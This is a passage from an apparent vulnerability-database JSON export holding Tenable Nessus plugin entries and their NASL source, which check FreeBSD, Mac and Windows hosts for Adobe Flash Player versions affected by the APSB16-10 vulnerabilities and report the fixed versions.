attacks that\ncould be used to bypass memory layout randomization mitigations\n(CVE-2016-1006).\n\nThese updates resolve type confusion vulnerabilities that could lead\nto code execution (CVE-2016-1015, CVE-2016-1019).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016,\nCVE-2016-1017, CVE-2016-1031).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021,\nCVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\nCVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029,\nCVE-2016-1032, CVE-2016-1033).\n\nThese updates resolve a stack overflow vulnerability that could lead\nto code execution (CVE-2016-1018).\n\nThese updates resolve a security bypass vulnerability (CVE-2016-1030).\n\nThese updates resolve a vulnerability in the directory search path\nused to find resources that could lead to code execution\n(CVE-2016-1014).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # https://vuxml.freebsd.org/freebsd/07888b49-35c4-11e6-8e82-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?feef2d98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.616\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.616\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.616\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:55", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is prior or equal to version 21.0.0.197. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-08T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-10.NASL", "href": "https://www.tenable.com/plugins/nessus/90426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90426);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is prior or equal to version 21.0.0.197. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.213 or later.\n\nAlternatively, Adobe has made version 18.0.0.343 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (version =~ \"^(19|2[01])\\.\")\n{\n cutoff_version = \"21.0.0.197\";\n fix = \"21.0.0.213\";\n}\nelse\n{\n cutoff_version = \"18.0.0.333\";\n fix = \"18.0.0.343\";\n}\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:05:53", "description": "The version of Adobe Flash Player installed on the remote Windows host is prior or equal to version 21.0.0.197. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-08T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB16-10.NASL", "href": "https://www.tenable.com/plugins/nessus/90425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90425);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 21.0.0.197 Multiple Vulnerabilities (APSB16-10)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis prior or equal to version 21.0.0.197. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.213 or later.\n\nAlternatively, Adobe has made version 18.0.0.343 available for those\ninstallations that cannot be upgraded to the latest version.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 21.0.0.197\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.333\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.333\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 21.0.0.197\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"21.0.0.197\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"21.0.0.213 / 18.0.0.343\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"21.0.0.213 / 18.0.0.343\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 21.0.0.213\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 21.0.0.213 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n security_report_v4(port:port, extra:info, severity:SECURITY_HOLE);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T16:06:12", "description": "The remote Windows host is missing KB3154132. It is, therefore, affected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass vulnerability exists that allows an attacker to predict memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1015, CVE-2016-1019)\n\n - An overflow condition exists that is triggered when handling JPEG-XR compressed image content. An attacker can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-12T00:00:00", "type": "nessus", "title": "MS16-050: Security Update for Adobe Flash Player (3154132)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1006", "CVE-2016-1011", "CVE-2016-1012", "CVE-2016-1013", "CVE-2016-1014", "CVE-2016-1015", "CVE-2016-1016", "CVE-2016-1017", "CVE-2016-1018", "CVE-2016-1019", "CVE-2016-1020", "CVE-2016-1021", "CVE-2016-1022", "CVE-2016-1023", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1026", "CVE-2016-1027", "CVE-2016-1028", "CVE-2016-1029", "CVE-2016-1030", "CVE-2016-1031", "CVE-2016-1032", "CVE-2016-1033"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-050.NASL", "href": "https://www.tenable.com/plugins/nessus/90443", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90443);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1006\",\n \"CVE-2016-1011\",\n \"CVE-2016-1012\",\n \"CVE-2016-1013\",\n \"CVE-2016-1014\",\n \"CVE-2016-1015\",\n \"CVE-2016-1016\",\n \"CVE-2016-1017\",\n \"CVE-2016-1018\",\n \"CVE-2016-1019\",\n \"CVE-2016-1020\",\n \"CVE-2016-1021\",\n \"CVE-2016-1022\",\n \"CVE-2016-1023\",\n \"CVE-2016-1024\",\n \"CVE-2016-1025\",\n \"CVE-2016-1026\",\n \"CVE-2016-1027\",\n \"CVE-2016-1028\",\n \"CVE-2016-1029\",\n \"CVE-2016-1030\",\n \"CVE-2016-1031\",\n \"CVE-2016-1032\",\n \"CVE-2016-1033\"\n );\n script_bugtraq_id(\n 85856,\n 85926,\n 85927,\n 85928,\n 85930,\n 85931,\n 85932,\n 85933\n );\n script_xref(name:\"MSFT\", value:\"MS16-050\");\n script_xref(name:\"MSKB\", value:\"3154132\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-225\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-226\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-227\");\n script_xref(name:\"ZDI\", value:\"ZDI-16-228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"MS16-050: Security Update for Adobe Flash Player (3154132)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3154132. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An Address Space Layout Randomization (ASLR) bypass\n vulnerability exists that allows an attacker to predict\n memory offsets in the call stack. (CVE-2016-1006)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1011,\n CVE-2016-1013, CVE-2016-1016, CVE-2016-1017,\n CVE-2016-1031)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1012,\n CVE-2016-1020, CVE-2016-1021, CVE-2016-1022,\n CVE-2016-1023, CVE-2016-1024, CVE-2016-1025,\n CVE-2016-1026, CVE-2016-1027, CVE-2016-1028,\n CVE-2016-1029, CVE-2016-1032, CVE-2016-1033)\n\n - A directory search path vulnerability exists that allows\n an attacker to disclose sensitive resources.\n (CVE-2016-1014)\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1015,\n CVE-2016-1019)\n\n - An overflow condition exists that is triggered when\n handling JPEG-XR compressed image content. An attacker\n can exploit this to execute arbitrary code.\n (CVE-2016-1018)\n\n - An unspecified security bypass vulnerability exists.\n (CVE-2016-1030)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-050\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2012, 8.1, RT 8.1,\n2012 R2, and 10. Alternatively, apply the workarounds as referenced in\nthe Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 